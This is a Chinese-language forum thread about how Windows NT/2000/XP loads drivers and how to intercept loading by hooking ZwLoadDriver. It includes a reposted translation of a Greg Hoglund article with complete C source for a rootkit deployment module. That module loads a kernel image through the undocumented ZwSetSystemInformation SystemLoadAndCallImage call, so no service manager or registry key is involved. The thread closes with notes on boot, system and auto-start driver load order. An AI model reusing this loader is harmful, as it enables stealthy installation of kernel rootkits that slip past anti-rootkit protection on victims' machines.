如何控制驱动的加载（通过设备名来决定是否要加载该驱动）？

各位大虾：
    1、驱动加载的时候在内核中是怎么样的一个过程？也就是说如果通过CreateService、OpenService、CreateFile等函数来产生、打开一个服务（驱动），并通过设备名来控制服务（驱动）是怎么一个过程（操作系统是怎么处理的）？那位大虾能够详细说明一下？！
   2、对于上面的过程中，我能过在那些地方加以控制？是否要写驱动，要写什么类型的驱动？在驱动中是否需要hook内核函数，需要hook哪些（native API）？

郁闷！怎么没有高手解答！

是不是只要hook ZwLoadDriver就可以了？
可是我用softice 设了断点，但是一点反应度没有！

Hook ZwLoadDriver是可以监测到driver的加载。但是，有的boot driver是和ntoskrnl.exe一起加载的，根本不通过ZwLoadDriver，比如scsiport.sys。

你用这个工具http://www.ybwork.com/ysniffer.htm看看就知道哪些driver是通过ZwLoadDriver加载的。

大侠，我在2000和XP下bpx ZwLoadDriver了；然后用CreateService和OpenService、CreateFile来动态装载、打开一个驱动；可是没看见softice拦截住呀！会是什么原因了？
我用的是DS2.7。

用SystemLoadAndCallImage加载Rootkit

创建时间：2003-09-25
文章属性：原创
文章提交：Sephiroth_ (kinvis_at_hotmail.com)

Sephiroth.V

[前言]
    我最近对NT Rootkit开始感兴趣，无奈国内的资料少得惊人，在这方面几

乎是一片空白，就只有翻译的Gary Hoglund的一篇《一个修改NT内核的真实的

ROOTKIT》。到国外的网站转了几天倒是收获非浅，国外在这方面的研究确实深刻多

了。现在我翻译另一篇Gary Hoglund的文章，在这篇文章里我加入了一些个人的注

释，如果大家对NT ROOTKIT感兴趣的话可以到www.rootkit.com上看看，那里有Gary

Hoglund和很多人的优秀的NT ROOTKIT和大量有价值的资料。

[正文]
    大家好。
    这段时间以来在NETBUGTRAQ上有个有关在内核模式下如何保护系统免遭

ROOTKIT的讨论。这是个好现象，我们rootkit.com的目的就是让人们思考这个问题

。比方说，现在就有一个Pedestal Software的ANTI-ROOTKIT(全名Integrity

Protection Driver)。
    在今年的Blackhat Briefings上，很多聪明的人在谈论有多少种方法把代

码加载进内核模式-很明显是受到“ANTI-ROOTKIT”的影响。很多ROOTKIT的作者也

加入其中。所以我们打算改变这个WINDOWS ROOTKIT。
    直到现在，这个WINDOWS ROOTKIT还是被设计为一个驱动程序。但是没有理

由一个ROOKIT必须被设计为一个驱动程序--或者一个可加载模块。
    去年我们发布了ROOTKIT来证明完全用户模式的软件是基本没有意义的。想

想看，任何一个能够HACK你的系统的人都可以去加载进内核模式，这是100%保证的

。如果一个攻击者用一个用户级的帐户进入你的系统，他们然后就是获得

ADMINISTRATOR--以获得足够的权限使你能够加载内核模式代码。在这个事实面前，

很容易看到你的服务商的解决办法离开你的知识是十分脆弱的。
    将完全的保护放到内核模式的主意挺不错，不过它不可能完成除非微软自

己解决。如果微软真这么做的话，那么安全公司就会消失：)
    现在有人提出一种加载内核模式代码的方法，使用一个未公布的入口

(entry point)进入内核空间--比方象/dev/physicalmemory设备，或者一个使用“

SystemLoadAndCallImage”的系统调用(syscall)。我们继续研究，但事实是有一个

非操作系统支持的影响点(leverage point)来控制进入内核模式--因为这样，新的

入口点(entry point)总是被发现。
    假定微软真的修补NT结构来保护以免于上面提到的这几种方法，也仍然有

通过在内核里寻找可供缓冲区溢出的方法。每个你安装的第三方驱动程序可以给予

你通过IOCTL()命令甚至是普通的读/写消息来进行缓冲区溢出的可能。甚至就是NT

里默认的驱动程序在这方面也很脆弱。
    当ROOKIT被当做驱动程序处理时，我们使用服务控制管理器(SCM)来从内核

空间加载或移除这个驱动程序。这是一个默认标准，并且它需要这个ROOTKIT驱动程

序在注册表CurrentControlSet/Services下有键值。现在这种情况已经被改变了，

我们改进了这个ROOTKIT这样当它加载进内核空间时既不需要驱动程序也不需要注册

表键值。我们也不再使用SCM，取而代之的是它使用一个单独的中断调用--一个名为

ZwSetSystemInformation()的NT系统调用。使用这个调用我们可以立即加载这个

ROOTKIT并激活它。

-Greg Hoglund

源代码：

////////////////////////////////////////
// New Deployment Module for rootkit 040
// -------------------------------------
// -Greg Hoglund http://www.rootkit.com
////////////////////////////////////////
#include <windows.h>
#include <stdio.h>


typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
#ifdef MIDL_PASS
    [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT *

Buffer;
#else // MIDL_PASS
    PWSTR Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;


typedef unsigned long NTSTATUS; //我认为这里应该是typedef long NTSTATUS,  

                        //否则一个unsigned的值总是不小于0，下面这个宏就会

                        //出问题
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)


NTSTATUS (__stdcall *ZwSetSystemInformation)(
  IN DWORD SystemInformationClass,
  IN OUT PVOID SystemInformation,
  IN ULONG SystemInformationLength
  );

/*
//有关ZwSetSystemInformation的用法可以参考Gary Nebbett的《Windows NT/2000

//Native API //Reference》
//ZwSetSystemInformation设置影响操作系统的信息，定义如下：
//  NTSYSAPI
//  NTSTATUS
//  NTAPI
//  ZwSetSystemInformation(
//    IN SYSTEM_IMFORMATION_CALSS SystemInformationClass,
//    IN OUT PVOID SystemInformation,
//    IN ULONG SystemInformationLength);
//
//参数：
//  SystemInformationClass：将被设置的系统信息的类型，值为

SYSTEM_IMFORMATION_CALSS枚举的一个//     子集，SystemLoadAndCallImage就是

其中一个：    
//       typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE{//Information Class

38             、 //            UNICODE_STRING ModuleName;
//       }SYSTEM_LOAD_AND_CALL_IMAGE,*PSYSTEM_LOAD_AND_CALL_IMAGE;
//
//    成员：
//        Module:要加载模块的NATIVE NT格式的完整路径
//
//    备注：
//         这个信息类只能被设置，不是设置任何信息，而是执行把一个模块加载

到内核地址空间和调//      用其入口点的操作。期望入口点例程是一个带两个参

数的__stdcall例程(与设备驱动程序的   //      DriverEntry例程一致)。如果入

口点例程返回一个失败代码，则卸载模块。
//
//  SystemInformation:指向含有被设置信息的一个调用者分配的缓冲区或变量
//  SystemInformationLength:以字节为单位的SystemInformaiton的大小，根据给

定的//     SystemInformationClass来设置它
//
*/

VOID (__stdcall *RtlInitUnicodeString)(
  IN OUT PUNICODE_STRING DestinationString,
  IN PCWSTR SourceString
  );


typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;


#define SystemLoadAndCallImage 38


void main(void)
{
///////////////////////////////////////////////////////////////
// Why mess with Drivers?
///////////////////////////////////////////////////////////////
SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
WCHAR daPath[] = L"\\??\\C:\\_root_.sys";


//////////////////////////////////////////////////////////////
// get DLL entry points
//////////////////////////////////////////////////////////////
if( !(RtlInitUnicodeString =
  (void *) GetProcAddress( GetModuleHandle("ntdll.dll"),
  "RtlInitUnicodeString" )) )        //在ntdll.dll中获取

RtlInitUnicodeString地址
  exit(1);


if( !(ZwSetSystemInformation =
  (void *) GetProcAddress( GetModuleHandle("ntdll.dll"),
  "ZwSetSystemInformation" )) )     //在ntdll.dll中获取

ZwSetSystemInformation地址
  exit(1);


RtlInitUnicodeString( &(GregsImage.ModuleName),
    daPath );         //建立设备



if( NT_SUCCESS(
  ZwSetSystemInformation( SystemLoadAndCallImage,
      &GregsImage,
      sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) ))     //加载进内核空间
{
  printf("Rootkit Loaded.\n");
}
else
{
  printf("Rootkit not loaded.\n");
}
}

注册表：当前控制集中的Service分支下保存专属于驱动程序的配置信息。这些配置信息包括驱动程序类型、启动类型。
当Windows启动时，Ntldr或Osloader读入SYSTEM注册表hive文件以加载引导驱动程序（启动类型为SERVICE_BOOT_START）；之后，Ntoskrnl.exe引导系统启动设备驱动程序（启动类型为SERVICE_SYSTEM_START）；之后，服务控制管理器（SCM）进程Services.exe加载所有自动启动（启动类型为SERVICE_AUTO_START）的服务程序和设备驱动程序。
StartService 指引服务控制管理器进程（Service.exe）执行ZwLoadDriver函数来完成加载服务和驱动程序。所以，只有调用到StartService才能被截住了。